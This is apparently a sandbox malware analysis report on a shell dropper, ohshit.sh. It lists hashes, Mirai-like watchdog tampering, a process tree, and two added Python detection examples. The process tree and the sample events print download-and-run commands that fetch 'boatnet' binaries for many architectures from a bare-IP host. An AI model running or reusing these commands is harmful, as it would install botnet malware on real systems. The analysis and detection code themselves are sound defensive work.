Analysis
- max time kernel: 61s
- max time network: 67s
- platform: debian-12_mipsel
- resource: debian12-mipsel-20240729-en
- resource tags: arch:mipsel, image:debian12-mipsel-20240729-en, kernel:6.1.0-17-4kc-malta, locale:en-us, os:debian-12-mipsel, system
- submitted: 31-08-2024 21:05
Static task: static1

Behavioral tasks (sample: ohshit.sh in every task)
- behavioral1: debian12-armhf-20240418-en
- behavioral2: debian12-mipsel-20240729-en
- behavioral3: debian9-armhf-20240611-en
- behavioral4: debian9-mipsbe-20240611-en
- behavioral5: debian9-mipsel-20240611-en
- behavioral6: ubuntu1804-amd64-20240508-en
- behavioral7: ubuntu2004-amd64-20240729-en
- behavioral8: ubuntu2204-amd64-20240611-en
General
- Target: ohshit.sh
- Size: 2KB
- MD5: fefdf2b7ece4d55bd47778b420f84011
- SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
- SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
- SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures

Executes dropped EXE (14 IoCs)
ioc       pid  process
/tmp/WTF  790  WTF
/tmp/WTF  798  WTF
/tmp/WTF  804  WTF
/tmp/WTF  810  WTF
/tmp/WTF  815  WTF
/tmp/WTF  820  WTF
/tmp/WTF  826  WTF
/tmp/WTF  836  WTF
/tmp/WTF  846  WTF
/tmp/WTF  855  WTF
/tmp/WTF  865  WTF
/tmp/WTF  874  WTF
/tmp/WTF  884  WTF
/tmp/WTF  895  WTF

Modifies Watchdog functionality (1 TTP, 16 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                   ioc                 process  count
File opened for modification  /dev/watchdog       WTF      8
File opened for modification  /dev/misc/watchdog  WTF      8

Yara rule hit
resource                         yara_rule
behavioral2/files/fstream-1.dat  upx

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder (1 TTP, 16 IoCs)
description                   ioc             process  count
File opened for modification  /sbin/watchdog  WTF      8
File opened for modification  /bin/watchdog   WTF      8

Reads runtime system information (64 IoCs)
Reads data from /proc virtual filesystem.
All 64 IoCs are "File opened for reading /proc/<pid>/status" by WTF. The pids, in report order and with repeats kept (several WTF instances scanned the process list):
30, 16, 847, 698, 6, 698, 405, 858, 829, 2, 11, 28, 23, 31, 15, 866, 11, 695, 868, 869, 33, 675, 118, 111, 751, 843, 392, 27, 112, 663, 53, 5, 885, 24, 843, 10, 837, 34, 35, 1, 827, 25, 862, 875, 392, 840, 674, 53, 698, 17, 35, 113, 59, 675, 675, 24, 30, 833, 7, 16, 9, 840, 837, 870

Writes file to tmp directory (15 IoCs)
Malware often drops required files in the /tmp directory.
description                   ioc                 process
File opened for modification  /tmp/boatnet.x86    curl
File opened for modification  /tmp/boatnet.mips   curl
File opened for modification  /tmp/boatnet.arc    curl
File opened for modification  /tmp/boatnet.mpsl   curl
File opened for modification  /tmp/boatnet.arm6   curl
File opened for modification  /tmp/boatnet.ppc    curl
File opened for modification  /tmp/boatnet.i468   curl
File opened for modification  /tmp/boatnet.x86_64 curl
File opened for modification  /tmp/boatnet.m68k   curl
File opened for modification  /tmp/WTF            ohshit.sh
File opened for modification  /tmp/boatnet.i686   curl
File opened for modification  /tmp/boatnet.arm    curl
File opened for modification  /tmp/boatnet.arm5   curl
File opened for modification  /tmp/boatnet.spc    curl
File opened for modification  /tmp/boatnet.arm7   curl
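A live-host counterpart to the signatures above, as an added example that is not the sandbox's own code: it walks /proc for the two behaviours the report attributes to /tmp/WTF, an executable running out of a world-writable directory and a process holding /dev/watchdog or /dev/misc/watchdog open. The fake /proc tree built by make_demo_proc() is constructed so the sweep runs offline; the reason strings and function names are this example's own.

```python
"""Sweep a /proc tree for the behaviours the sandbox flagged on /tmp/WTF.
Added example; make_demo_proc() fabricates a minimal /proc for offline use."""
from __future__ import annotations

import os
import tempfile
from dataclasses import dataclass

TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
WATCHDOG_NODES = ("/dev/watchdog", "/dev/misc/watchdog")


@dataclass
class Hit:
    pid: int
    reason: str
    detail: str


def _readlink(path: str) -> str | None:
    try:
        return os.readlink(path)
    except OSError:  # no permission, or the process has already exited
        return None


def sweep(proc_root: str = "/proc") -> list[Hit]:
    """Inspect every numeric entry under proc_root (run as root for full coverage)."""
    hits: list[Hit] = []
    for name in sorted((n for n in os.listdir(proc_root) if n.isdigit()), key=int):
        pid, base = int(name), os.path.join(proc_root, name)
        exe = _readlink(os.path.join(base, "exe")) or ""
        if exe.endswith(" (deleted)"):  # binary unlinked after exec, common for droppers
            hits.append(Hit(pid, "deleted_exe", exe))
        if any(exe.startswith(d + "/") for d in TMP_DIRS):
            hits.append(Hit(pid, "exe_in_tmp", exe))
        fd_dir = os.path.join(base, "fd")
        if os.path.isdir(fd_dir):
            for fd in sorted(os.listdir(fd_dir), key=int):
                target = _readlink(os.path.join(fd_dir, fd))
                if target in WATCHDOG_NODES:
                    hits.append(Hit(pid, "watchdog_open", f"fd {fd} -> {target}"))
    return hits


def make_demo_proc() -> str:
    """Constructed fake /proc: PID 1 as a benign daemon, PID 826 shaped like the report's WTF."""
    root = tempfile.mkdtemp(prefix="fakeproc-")

    def add(pid: int, exe: str, fds: dict[int, str]) -> None:
        d = os.path.join(root, str(pid))
        os.makedirs(os.path.join(d, "fd"))
        os.symlink(exe, os.path.join(d, "exe"))
        for n, target in fds.items():
            os.symlink(target, os.path.join(d, "fd", str(n)))

    add(1, "/usr/lib/systemd/systemd", {0: "/dev/null"})
    add(826, "/tmp/WTF", {0: "/dev/null", 3: "/dev/watchdog", 4: "/dev/misc/watchdog"})
    return root


if __name__ == "__main__":
    for h in sweep(make_demo_proc()):
        print(f"pid {h.pid:<5} {h.reason:14} {h.detail}")
```

Caveat: Mirai's public source closes the watchdog node right after the disabling ioctl, so the fd check only catches variants that keep it open; treat the audit trail (the "opened for modification" events above) as the primary signal, and verify that /bin/watchdog and /sbin/watchdog still match the installed package (dpkg -V or rpm -V) since the report shows both being opened for modification.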
Processes

PID 742  /tmp/ohshit.sh  /tmp/ohshit.sh  (depth 1)
         - Writes file to tmp directory

All following processes are children of PID 742 (depth 2), in report order:

PID 749  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.x86
         - Writes file to tmp directory
PID 788  /usr/bin/cat    cat boatnet.x86
PID 789  /usr/bin/chmod  chmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF
PID 790  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 793  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.mips
         - Writes file to tmp directory
PID 796  /usr/bin/cat    cat boatnet.mips
PID 797  /usr/bin/chmod  chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 798  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 801  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.arc
         - Writes file to tmp directory
PID 802  /usr/bin/cat    cat boatnet.arc
PID 803  /usr/bin/chmod  chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 804  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 807  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.i468
         - Writes file to tmp directory
PID 808  /usr/bin/cat    cat boatnet.i468
PID 809  /usr/bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 810  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 812  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.i686
         - Writes file to tmp directory
PID 813  /usr/bin/cat    cat boatnet.i686
PID 814  /usr/bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 815  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 817  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64
         - Writes file to tmp directory
PID 818  /usr/bin/cat    cat boatnet.x86_64
PID 819  /usr/bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 820  /tmp/WTF        ./WTF
         - Executes dropped EXE
PID 823  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl
         - Writes file to tmp directory
PID 824  /usr/bin/cat    cat boatnet.mpsl
PID 825  /usr/bin/chmod  chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 826  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 832  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.arm
         - Writes file to tmp directory
PID 835  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 836  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 842  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.arm5
         - Writes file to tmp directory
PID 845  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 846  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 852  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.arm6
         - Writes file to tmp directory
PID 854  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 855  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 861  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.arm7
         - Writes file to tmp directory
PID 864  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 865  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 871  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.ppc
         - Writes file to tmp directory
PID 873  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 874  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 881  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.spc
         - Writes file to tmp directory
PID 883  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 884  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
PID 891  /usr/bin/curl   curl -O http://94.156.71.225/hiddenbin/boatnet.m68k
         - Writes file to tmp directory
PID 894  /usr/bin/chmod  chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF
PID 895  /tmp/WTF        ./WTF
         - Executes dropped EXE
         - Modifies Watchdog functionality
         - Writes file to system bin folder
         - Reads runtime system information
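Detection logic for the chain the process tree and signature tables show (fetch boatnet.<arch> from a bare-IP URL with curl -O, chmod +x everything in /tmp, run the freshly written /tmp/WTF, then tamper with the watchdog), as an added example that is not the sandbox's or the sample's code. The events are constructed to mirror a subset of the report (PIDs, paths and the chmod argv are copied from it; the ppid 700 and the two benign events are made up); the Event layout, rule names and thresholds are this example's own assumptions. The chmod rule keys on something the report makes visible: the argv lists systemd-private-* directories the script never created, in collation order, which is what a `chmod +x *` glob in /tmp produces.

```python
"""Replay constructed execve/open events through rules for the ohshit.sh dropper chain.
Added example; Event fields, rule names and the sample data are assumptions."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

RAW_IP_URL = re.compile(r"^https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/")
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
WATCHDOG_NODES = ("/dev/watchdog", "/dev/misc/watchdog")
SYSTEM_BIN_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin")


@dataclass
class Event:
    """One process: roughly an auditd EXECVE record plus the paths it opened for write."""
    pid: int
    ppid: int
    exe: str
    argv: list[str]
    cwd: str = "/tmp"
    writes: list[str] = field(default_factory=list)


@dataclass
class Finding:
    rule: str
    pid: int
    detail: str


def in_tmp(path: str) -> bool:
    return any(path == d or path.startswith(d + "/") for d in TMP_DIRS)


def is_raw_ip_download(ev: Event) -> bool:
    """curl/wget run from a world-writable directory against a bare-IP URL."""
    tool = ev.exe.rsplit("/", 1)[-1]
    return tool in ("curl", "wget") and in_tmp(ev.cwd) and any(RAW_IP_URL.match(a) for a in ev.argv)


def is_glob_chmod(ev: Event) -> bool:
    """chmod +x in a tmp dir whose operands look glob-expanded: foreign systemd-private-*
    entries, or three or more operands already in (case-folded) collation order."""
    if ev.exe.rsplit("/", 1)[-1] != "chmod" or "+x" not in ev.argv or not in_tmp(ev.cwd):
        return False
    operands = [a for a in ev.argv[1:] if not a.startswith(("+", "-"))]
    foreign = any(op.startswith("systemd-private-") for op in operands)
    return foreign or (len(operands) >= 3 and operands == sorted(operands, key=str.lower))


def detect(events: list[Event]) -> list[Finding]:
    """Run the rules over events in chronological order, then correlate per parent pid."""
    findings: list[Finding] = []
    dropped: set[str] = set()                       # files already written under a tmp dir
    stages: dict[int, set[str]] = defaultdict(set)  # ppid -> chain stages seen among its children
    for ev in events:
        for path in ev.writes:
            if in_tmp(path):
                dropped.add(path)
            if path in WATCHDOG_NODES:
                findings.append(Finding("watchdog_tamper", ev.pid, f"{ev.exe} opened {path} for write"))
            if any(path.startswith(d + "/") for d in SYSTEM_BIN_DIRS):
                findings.append(Finding("system_bin_write", ev.pid, f"{ev.exe} wrote {path}"))
        if is_raw_ip_download(ev):
            findings.append(Finding("raw_ip_download", ev.pid, " ".join(ev.argv)))
            stages[ev.ppid].add("download")
        if is_glob_chmod(ev):
            findings.append(Finding("glob_chmod_tmp", ev.pid, " ".join(ev.argv)))
            stages[ev.ppid].add("chmod")
        if ev.exe in dropped:                       # executing a file written earlier in this trace
            findings.append(Finding("exec_dropped_tmp", ev.pid, ev.exe))
            stages[ev.ppid].add("exec")
    for ppid, seen in stages.items():
        if seen >= {"download", "chmod", "exec"}:
            findings.append(Finding("dropper_chain", ppid, "download -> chmod -> exec under one parent"))
    return findings


# Constructed events: a subset of the report's tree (ppid 700 is assumed) plus benign noise.
SP = "systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE"
C2 = "http://94.156.71.225/hiddenbin/"
SAMPLE_EVENTS = [
    Event(742, 700, "/tmp/ohshit.sh", ["/tmp/ohshit.sh"], writes=["/tmp/WTF"]),
    Event(749, 742, "/usr/bin/curl", ["curl", "-O", C2 + "boatnet.x86"], writes=["/tmp/boatnet.x86"]),
    Event(788, 742, "/usr/bin/cat", ["cat", "boatnet.x86"]),
    Event(789, 742, "/usr/bin/chmod", ["chmod", "+x", "boatnet.x86", "ohshit.sh", SP, "WTF"]),
    Event(790, 742, "/tmp/WTF", ["./WTF"]),
    Event(823, 742, "/usr/bin/curl", ["curl", "-O", C2 + "boatnet.mpsl"], writes=["/tmp/boatnet.mpsl"]),
    Event(826, 742, "/tmp/WTF", ["./WTF"],
          writes=["/dev/watchdog", "/dev/misc/watchdog", "/sbin/watchdog", "/bin/watchdog"]),
    Event(900, 1, "/usr/bin/chmod", ["chmod", "+x", "build.sh"], cwd="/home/dev"),
    Event(901, 1, "/usr/bin/curl", ["curl", "-O", "https://deb.debian.org/debian/dists/bookworm/Release"],
          cwd="/home/dev"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:18} pid={f.pid:<4} {f.detail}")
```

The correlation keyed on the parent pid is what turns four noisy single-event rules into one high-confidence alert: a sysadmin's `chmod +x build.sh` or a curl to a package mirror never completes the chain. To feed real data, map auditd EXECVE/CWD/PATH records (or an EDR's process and file events) onto Event in timestamp order; the exec_dropped_tmp rule depends on the write being seen before the execve.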
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 36KB
- MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
- SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
- SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
- SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d